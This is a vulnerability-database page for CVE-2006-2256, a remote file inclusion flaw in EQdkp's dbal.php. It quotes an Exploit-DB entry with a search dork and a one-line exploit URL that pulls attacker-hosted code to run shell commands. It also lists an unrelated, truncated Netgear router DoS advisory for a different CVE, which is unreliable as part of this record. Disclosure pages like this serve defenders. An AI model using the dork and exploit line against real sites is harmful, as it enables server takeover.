CVE-2006-2256
published 2006-05-09CVE-2006-2256: PHP remote file inclusion vulnerability in includes/dbal.php in EQdkp 1.3.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP346medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
7.31%
93.6th percentile
PHP remote file inclusion vulnerability in includes/dbal.php in EQdkp 1.3.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the eqdkp_root_path parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eqdkp | eqdkp | — | — |
| eqdkp | eqdkp | — | — |
| eqdkp | eqdkp | — | — |
| eqdkp | eqdkp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Netgear DG632 Router - Remote Denial of Service
exploitdb·2009-06-15
CVE-2009-2256 Netgear DG632 Router - Remote Denial of Service
Netgear DG632 Router - Remote Denial of Service
---
Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: [email protected]
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009
I. DESCRIPTION
The Netgear DG632 router has a web interface which runs on port 80. This
allows an admin to login and administer the device's settings. However,
a Denial of Service (DoS) vulnerability exists that causes the web interface
to crash and stop responding to further requests.
II. DETAILS
Within the "/cgi-bin/" directory of the administrative web interface exists a
file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST
request for this file causes the web server to
Exploit-DB
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion
exploitdb·2006-05-07
CVE-2006-2256 EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion
---
Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew
Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
# milw0rm.com [2006-05-07]
No writeups or analysis indexed.
http://secunia.com/advisories/20040http://www.osvdb.org/25339http://www.securityfocus.com/bid/17888http://www.vupen.com/english/advisories/2006/1693https://exchange.xforce.ibmcloud.com/vulnerabilities/26357https://www.exploit-db.com/exploits/1764http://secunia.com/advisories/20040http://www.osvdb.org/25339http://www.securityfocus.com/bid/17888http://www.vupen.com/english/advisories/2006/1693https://exchange.xforce.ibmcloud.com/vulnerabilities/26357https://www.exploit-db.com/exploits/1764
2006-05-09
Published